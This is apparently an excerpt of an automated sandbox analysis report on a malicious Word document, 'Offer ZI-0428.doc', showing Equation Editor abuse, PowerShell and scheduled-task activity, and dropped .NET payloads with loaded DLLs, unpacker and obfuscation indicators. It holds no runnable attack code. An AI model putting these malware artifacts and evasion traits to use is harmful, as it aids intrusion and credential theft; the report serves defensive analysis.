                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: rpcrtremote.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: atl.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: pstorec.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: atl.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: mozglue.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: dbghelp.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: msvcp140.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: vcruntime140.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: ucrtbase.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: shcore.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                  Source: Offer ZI-0428.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Offer ZI-0428.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: plug[1].scr.2.dr, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: plugman23456.scr.2.dr, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: znlzneAxBVd.exe.5.dr, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.cs.Net Code: MNFJrBJ49X System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.cs.Net Code: MNFJrBJ49X System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.cs.Net Code: MNFJrBJ49X System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,21_2_004044A4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0032713E push edi; ret 2_2_0032713F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00326626 push esi; ret 2_2_00326627
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0032332E push edi; ret 2_2_0032332F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00310003 push 80000000h; iretd 2_2_00310008
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0031C264 pushad ; retn 0031h2_2_0031C289
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00314943 push 80000000h; iretd 2_2_00314948
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00318F44 push eax; retf 2_2_00318F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003250B0 push edi; ret 2_2_003250B3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003258BA push esi; ret 2_2_003258BB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003265F6 push esi; ret 2_2_003265F7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003101F4 push eax; retf 2_2_003101F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003265FE push esi; ret 2_2_003265FF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003265EE push esi; ret 2_2_003265EF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003270D6 push ebp; ret 2_2_003270D7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0030FFD9 push 80000000h; retf 0000h2_2_0030FFE0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0031C2DC pushad ; retn 0031h2_2_0031C2DD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003232C6 push ebp; ret 2_2_003232C7
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10002806 push ecx; ret 12_2_10002819
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044693D push ecx; ret 21_2_0044694D
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044DB70 push eax; ret 21_2_0044DB84
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044DB70 push eax; ret 21_2_0044DBAC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00451D54 push eax; ret 21_2_00451D61
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0044B090 push eax; ret 22_2_0044B0A4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0044B090 push eax; ret 22_2_0044B0CC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00451D34 push eax; ret 22_2_00451D41
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00444E71 push ecx; ret 22_2_00444E81
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00414060 push eax; ret 23_2_00414074
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00414060 push eax; ret 23_2_0041409C
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00414039 push ecx; ret 23_2_00414049
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_004164EB push 0000006Ah; retf 23_2_004165C4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00416553 push 0000006Ah; retf 23_2_004165C4
                  Source: plug[1].scr.2.drStatic PE information: section name: .text entropy: 7.954754683206141
                  Source: plugman23456.scr.2.drStatic PE information: section name: .text entropy: 7.954754683206141
                  Source: znlzneAxBVd.exe.5.drStatic PE information: section name: .text entropy: 7.954754683206141
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, gVPP59x0g7rK6ZWOvl.csHigh entropy of concatenated method names: 'b5jRAhRFS2', 'YvGR4nOMMO', 'NdxRl73dVZ', 'MipRtbHrsB', 'fXmRbjFT6c', 'O6OROrOBfO', 'RU6R7BbkJ0', 'RaoRBTGZt7', 'JJFR2UQ3iq', 'TZtRaii9Sb'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, b5Z6ZpMTmYhNDSOPgy.csHigh entropy of concatenated method names: 'CcgkmqZxk3', 'ppak8ZSyrZ', 'h6kkruOIyE', 'orckSdQMT6', 'ngdkYtxfSL', 'n1Akvm6oEV', 'a4qkiMblni', 'w1hkLu7Fff', 'tNgMFIBHoepsk8Ka4Th', 'nrsIm6BJU5f9veCD0cL'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, UCLDXKTwALbqw6acgM.csHigh entropy of concatenated method names: 'yM7ksBmBTl', 'HndkRkGkKX', 'vTmkZ8trKM', 'gMvkjIaWBs', 'gbsknObfCI', 'DARZb63CaB', 'MfhZOYGnZx', 'L7tZ7hPUrJ', 'JivZByQMkg', 'mMAZ28XhEK'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, Uh7CyXBrKx7CHZBlRH.csHigh entropy of concatenated method names: 'UHmGfNv42k', 'muAGRKIIsE', 'L3CG9aBl27', 'E1PGZVddug', 'TEVGk3pHmQ', 'wIVGjebxir', 'wiLGnVOW23', 'CLBGgGNRZT', 'QQEGpNWXvI', 'I72GoVUoA0'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, ot7ccRIYfCGBeI1Nt4.csHigh entropy of concatenated method names: 'I9kjfTS8Xx', 'lwjj9w04Sm', 'FWRjkIbkRX', 'PTxkaJQD8J', 'Km6kzeqd0l', 'UOojQg6Ve4', 'i7OjW1pxjC', 'b0WjCJqjab', 'L5bj65aWBm', 'mhJjJS3Imo'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, TfG9VpJWTGHvDMAOW4.csHigh entropy of concatenated method names: 'YpRWjVPP59', 'og7WnrK6ZW', 'wkwWpDkSYM', 'JtdWo6aRkg', 'ptWW0vEbCL', 'HXKWUwALbq', 'SyGdN4oX9VAoaRmADl', 'K4q2eu4bVFhxOAbFw4', 'zJvWWjpQ56', 'WD9W61XbPE'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, C9ZsP4lLVd0D38e7iF.csHigh entropy of concatenated method names: 'ToString', 'WDEU1wLqk3', 'HHEUdnCIRm', 'qJDUDKOY6F', 'mDSUM7sM6E', 'Ai8UXBHrbM', 'dIJUEQhHyE', 'McGUIpvb6O', 'gXRUcHSxwT', 'ucbU5P1MYa'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, WiwhDEOeobox14JLf2.csHigh entropy of concatenated method names: 'QW0yBfccu6', 'B4Sya7iGUa', 'iJZGQfT9D8', 'HE3GWR46Ka', 'V05y1IibIJ', 'Khoy3flCdB', 'gGTyKVU5EZ', 'MBjyAVjeQ4', 'N4wy4hJVax', 'OUjylidDyA'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, fCsRxAWQlGZ1RtPLE5a.csHigh entropy of concatenated method names: 'j4SH8ei9ae', 'LSWHq1gOA3', 'vPVHrie5qh', 'cxQHSWHhQm', 'JsQHN1Vjc1', 'Nl2HYLN9ox', 'u5MHvf5PBP', 'fOMHxfnyY8', 'lNZHiZHAXZ', 'zqRHLSnaWy'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, npLGRyAU4LiV4BYMRm.csHigh entropy of concatenated method names: 'EcP0FOtUmJ', 'ACc03KItT3', 'ubN0AN8g5R', 'FMx04Zous4', 'zjR0dHBMrw', 'MhS0DJxAC8', 'qT20MYyqDJ', 'f800XOmME2', 'Oss0EVfh8s', 'vO40Ihavxn'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, VwD1A4Krg6ay80AAUQ.csHigh entropy of concatenated method names: 'qbZVxjSrcO', 'w07ViddbQE', 'JbGVTLemUj', 'gkyVd77AmV', 'NAsVMQxdmn', 'jgHVXtK9rO', 'tncVIhU4PQ', 'IQvVc1Kj8p', 'fVCVF0xIWc', 'Ax0V1yLvNU'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, YRkgxaL7fs19wUtWvE.csHigh entropy of concatenated method names: 'felZN1DGWV', 'bM7Zv1sqCb', 'gAr9DoQKIu', 'UJE9Mv6Kne', 'mKS9XbFkYU', 'LYS9EBAffH', 'uj39IaNKPp', 'Kv09cfOhfr', 'FG5956HejZ', 'IFQ9F7DEmL'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, lWFL1Zax9sOlYCjl2P.csHigh entropy of concatenated method names: 'DdpHWTbDRO', 'KRBH6h2vdJ', 'zXUHJQrVqf', 'mbbHfYYLy9', 'xANHRRDxw6', 'MUoHZ5iLSh', 'WWaHk1lj6k', 'O0RG7UYSnU', 'pTcGBqm2pL', 'ufIG2Xg9S6'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, MiBZoGzXoBWkGomNiG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'muYHVTUo6Z', 'p88H0Zhxp3', 'lT7HUyeWvQ', 'zogHyLOKrn', 'TK7HGKkwA5', 'Rh7HHC5oVW', 'IjJHPEkm2i'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, PnUTpiW6WXJMEpReP0D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MB6PAaKGyY', 'nvcP4FhPis', 'zRRPlEnNtP', 'Q6dPtSmEwS', 'XdVPbWMdS6', 'iwfPOLOEV0', 'uFLP7IIQXi'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, l2l1amikwDkSYMXtd6.csHigh entropy of concatenated method names: 'lI29S99lQ7', 'BNi9Ys1CuM', 'Hgt9xZcCnu', 'XB39iTbVIt', 'CAY90IF9lq', 'xpi9UFIu4H', 'rAL9ynlF30', 'Qjt9GIswhG', 'f1S9HckxLr', 'CFW9P57PY4'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kQAisy255KPRYZ0AXG.csHigh entropy of concatenated method names: 'P4IGToaCJd', 'GueGdNPvTn', 'DHsGDrF35t', 'VaDGMP8Lgi', 'AEpGA3o8aE', 'e5EGXFr1uc', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, MXbKB5RaqyYt1WWwDP.csHigh entropy of concatenated method names: 'Dispose', 'PTEW2NSV7A', 'TiHCdBEVPr', 'HcDqqfoK8s', 'WbhWa7CyXr', 'Qx7WzCHZBl', 'ProcessDialogKey', 'gHnCQQAisy', 'N5KCWPRYZ0', 'QXGCCgWFL1'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, QgxhOK5sxigKaKcO6j.csHigh entropy of concatenated method names: 'cG2j8eubCD', 'LedjqDoLR1', 'q4tjrFlSQD', 'RyijS8mdUF', 'QHyjN543vd', 'Gx8jY4C19u', 'GD8jvZxWcA', 'i19jxE001t', 'FjIjiMlDPT', 'SQFjLomEgB'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, tCvJFyCJaxowbDKX1A.csHigh entropy of concatenated method names: 'WuyrCR4ii', 'r3VSjpeMF', 'tN8YPqYSd', 'tIgvnJRrK', 'O5Gi1aOSO', 'D84LjCe3k', 'LG6YTMAcligSBlsVSp', 'bkgEXnhhq1ElD9pE2c', 'XdLGjx18M', 'sLmPaacGU'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.csHigh entropy of concatenated method names: 'sjP6siki0O', 'UlC6fKZmgk', 'Nj36R1ZHHC', 'n9H69Meg9Z', 'Voj6ZscI9o', 'Kok6kqO1mq', 'AsR6jApGAj', 'S4D6nXSNtD', 'pNM6gjcPtm', 'oof6pxaZNP'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, gVPP59x0g7rK6ZWOvl.csHigh entropy of concatenated method names: 'b5jRAhRFS2', 'YvGR4nOMMO', 'NdxRl73dVZ', 'MipRtbHrsB', 'fXmRbjFT6c', 'O6OROrOBfO', 'RU6R7BbkJ0', 'RaoRBTGZt7', 'JJFR2UQ3iq', 'TZtRaii9Sb'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, b5Z6ZpMTmYhNDSOPgy.csHigh entropy of concatenated method names: 'CcgkmqZxk3', 'ppak8ZSyrZ', 'h6kkruOIyE', 'orckSdQMT6', 'ngdkYtxfSL', 'n1Akvm6oEV', 'a4qkiMblni', 'w1hkLu7Fff', 'tNgMFIBHoepsk8Ka4Th', 'nrsIm6BJU5f9veCD0cL'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, UCLDXKTwALbqw6acgM.csHigh entropy of concatenated method names: 'yM7ksBmBTl', 'HndkRkGkKX', 'vTmkZ8trKM', 'gMvkjIaWBs', 'gbsknObfCI', 'DARZb63CaB', 'MfhZOYGnZx', 'L7tZ7hPUrJ', 'JivZByQMkg', 'mMAZ28XhEK'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, Uh7CyXBrKx7CHZBlRH.csHigh entropy of concatenated method names: 'UHmGfNv42k', 'muAGRKIIsE', 'L3CG9aBl27', 'E1PGZVddug', 'TEVGk3pHmQ', 'wIVGjebxir', 'wiLGnVOW23', 'CLBGgGNRZT', 'QQEGpNWXvI', 'I72GoVUoA0'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, ot7ccRIYfCGBeI1Nt4.csHigh entropy of concatenated method names: 'I9kjfTS8Xx', 'lwjj9w04Sm', 'FWRjkIbkRX', 'PTxkaJQD8J', 'Km6kzeqd0l', 'UOojQg6Ve4', 'i7OjW1pxjC', 'b0WjCJqjab', 'L5bj65aWBm', 'mhJjJS3Imo'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, TfG9VpJWTGHvDMAOW4.csHigh entropy of concatenated method names: 'YpRWjVPP59', 'og7WnrK6ZW', 'wkwWpDkSYM', 'JtdWo6aRkg', 'ptWW0vEbCL', 'HXKWUwALbq', 'SyGdN4oX9VAoaRmADl', 'K4q2eu4bVFhxOAbFw4', 'zJvWWjpQ56', 'WD9W61XbPE'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, C9ZsP4lLVd0D38e7iF.csHigh entropy of concatenated method names: 'ToString', 'WDEU1wLqk3', 'HHEUdnCIRm', 'qJDUDKOY6F', 'mDSUM7sM6E', 'Ai8UXBHrbM', 'dIJUEQhHyE', 'McGUIpvb6O', 'gXRUcHSxwT', 'ucbU5P1MYa'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, WiwhDEOeobox14JLf2.csHigh entropy of concatenated method names: 'QW0yBfccu6', 'B4Sya7iGUa', 'iJZGQfT9D8', 'HE3GWR46Ka', 'V05y1IibIJ', 'Khoy3flCdB', 'gGTyKVU5EZ', 'MBjyAVjeQ4', 'N4wy4hJVax', 'OUjylidDyA'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, fCsRxAWQlGZ1RtPLE5a.csHigh entropy of concatenated method names: 'j4SH8ei9ae', 'LSWHq1gOA3', 'vPVHrie5qh', 'cxQHSWHhQm', 'JsQHN1Vjc1', 'Nl2HYLN9ox', 'u5MHvf5PBP', 'fOMHxfnyY8', 'lNZHiZHAXZ', 'zqRHLSnaWy'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, npLGRyAU4LiV4BYMRm.csHigh entropy of concatenated method names: 'EcP0FOtUmJ', 'ACc03KItT3', 'ubN0AN8g5R', 'FMx04Zous4', 'zjR0dHBMrw', 'MhS0DJxAC8', 'qT20MYyqDJ', 'f800XOmME2', 'Oss0EVfh8s', 'vO40Ihavxn'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, VwD1A4Krg6ay80AAUQ.csHigh entropy of concatenated method names: 'qbZVxjSrcO', 'w07ViddbQE', 'JbGVTLemUj', 'gkyVd77AmV', 'NAsVMQxdmn', 'jgHVXtK9rO', 'tncVIhU4PQ', 'IQvVc1Kj8p', 'fVCVF0xIWc', 'Ax0V1yLvNU'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, YRkgxaL7fs19wUtWvE.csHigh entropy of concatenated method names: 'felZN1DGWV', 'bM7Zv1sqCb', 'gAr9DoQKIu', 'UJE9Mv6Kne', 'mKS9XbFkYU', 'LYS9EBAffH', 'uj39IaNKPp', 'Kv09cfOhfr', 'FG5956HejZ', 'IFQ9F7DEmL'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, lWFL1Zax9sOlYCjl2P.csHigh entropy of concatenated method names: 'DdpHWTbDRO', 'KRBH6h2vdJ', 'zXUHJQrVqf', 'mbbHfYYLy9', 'xANHRRDxw6', 'MUoHZ5iLSh', 'WWaHk1lj6k', 'O0RG7UYSnU', 'pTcGBqm2pL', 'ufIG2Xg9S6'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, MiBZoGzXoBWkGomNiG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'muYHVTUo6Z', 'p88H0Zhxp3', 'lT7HUyeWvQ', 'zogHyLOKrn', 'TK7HGKkwA5', 'Rh7HHC5oVW', 'IjJHPEkm2i'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, PnUTpiW6WXJMEpReP0D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MB6PAaKGyY', 'nvcP4FhPis', 'zRRPlEnNtP', 'Q6dPtSmEwS', 'XdVPbWMdS6', 'iwfPOLOEV0', 'uFLP7IIQXi'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, l2l1amikwDkSYMXtd6.csHigh entropy of concatenated method names: 'lI29S99lQ7', 'BNi9Ys1CuM', 'Hgt9xZcCnu', 'XB39iTbVIt', 'CAY90IF9lq', 'xpi9UFIu4H', 'rAL9ynlF30', 'Qjt9GIswhG', 'f1S9HckxLr', 'CFW9P57PY4'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kQAisy255KPRYZ0AXG.csHigh entropy of concatenated method names: 'P4IGToaCJd', 'GueGdNPvTn', 'DHsGDrF35t', 'VaDGMP8Lgi', 'AEpGA3o8aE', 'e5EGXFr1uc', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, MXbKB5RaqyYt1WWwDP.csHigh entropy of concatenated method names: 'Dispose', 'PTEW2NSV7A', 'TiHCdBEVPr', 'HcDqqfoK8s', 'WbhWa7CyXr', 'Qx7WzCHZBl', 'ProcessDialogKey', 'gHnCQQAisy', 'N5KCWPRYZ0', 'QXGCCgWFL1'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, QgxhOK5sxigKaKcO6j.csHigh entropy of concatenated method names: 'cG2j8eubCD', 'LedjqDoLR1', 'q4tjrFlSQD', 'RyijS8mdUF', 'QHyjN543vd', 'Gx8jY4C19u', 'GD8jvZxWcA', 'i19jxE001t', 'FjIjiMlDPT', 'SQFjLomEgB'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, tCvJFyCJaxowbDKX1A.csHigh entropy of concatenated method names: 'WuyrCR4ii', 'r3VSjpeMF', 'tN8YPqYSd', 'tIgvnJRrK', 'O5Gi1aOSO', 'D84LjCe3k', 'LG6YTMAcligSBlsVSp', 'bkgEXnhhq1ElD9pE2c', 'XdLGjx18M', 'sLmPaacGU'
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.csHigh entropy of concatenated method names: 'sjP6siki0O', 'UlC6fKZmgk', 'Nj36R1ZHHC', 'n9H69Meg9Z', 'Voj6ZscI9o', 'Kok6kqO1mq', 'AsR6jApGAj', 'S4D6nXSNtD', 'pNM6gjcPtm', 'oof6pxaZNP'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, gVPP59x0g7rK6ZWOvl.csHigh entropy of concatenated method names: 'b5jRAhRFS2', 'YvGR4nOMMO', 'NdxRl73dVZ', 'MipRtbHrsB', 'fXmRbjFT6c', 'O6OROrOBfO', 'RU6R7BbkJ0', 'RaoRBTGZt7', 'JJFR2UQ3iq', 'TZtRaii9Sb'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, b5Z6ZpMTmYhNDSOPgy.csHigh entropy of concatenated method names: 'CcgkmqZxk3', 'ppak8ZSyrZ', 'h6kkruOIyE', 'orckSdQMT6', 'ngdkYtxfSL', 'n1Akvm6oEV', 'a4qkiMblni', 'w1hkLu7Fff', 'tNgMFIBHoepsk8Ka4Th', 'nrsIm6BJU5f9veCD0cL'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, UCLDXKTwALbqw6acgM.csHigh entropy of concatenated method names: 'yM7ksBmBTl', 'HndkRkGkKX', 'vTmkZ8trKM', 'gMvkjIaWBs', 'gbsknObfCI', 'DARZb63CaB', 'MfhZOYGnZx', 'L7tZ7hPUrJ', 'JivZByQMkg', 'mMAZ28XhEK'
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, Uh7CyXBrKx7CHZBlRH.csHigh entropy of concatenated method names: 'UHmGfNv42k', 'muAGRKIIsE', 'L3CG9aBl27', 'E1PGZVddug', 'TEVGk3pHmQ', 'wIVGjebxir', 'wiLGnVOW23', 'CLBGgGNRZT', 'QQEGpNWXvI', 'I72GoVUoA0'
